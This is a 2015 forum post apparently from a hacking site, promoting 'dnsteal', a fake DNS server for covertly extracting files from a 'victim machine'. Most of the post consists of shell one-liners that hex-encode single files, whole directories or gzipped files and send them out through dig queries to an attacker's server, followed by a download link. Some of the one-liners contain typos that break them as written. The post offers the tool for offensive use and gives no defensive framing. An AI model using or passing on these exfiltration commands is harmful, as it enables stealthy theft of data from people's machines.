Post Reply
User avatar
Site Admin
Posts: 708
Joined: Sun Feb 16, 2014 3:30 pm


Post by hackinformer » Sun Sep 27, 2015 6:37 pm

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:

Alt text

On the victim machine, you simply can do something like so:

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files

for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done
gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:

python dnsteal.py -z

Then on the victim machine send a Gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
or for multiple, gzip compressed files:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done

Download: https://github.com/m57/dnsteal/archive/master.zip
Post Reply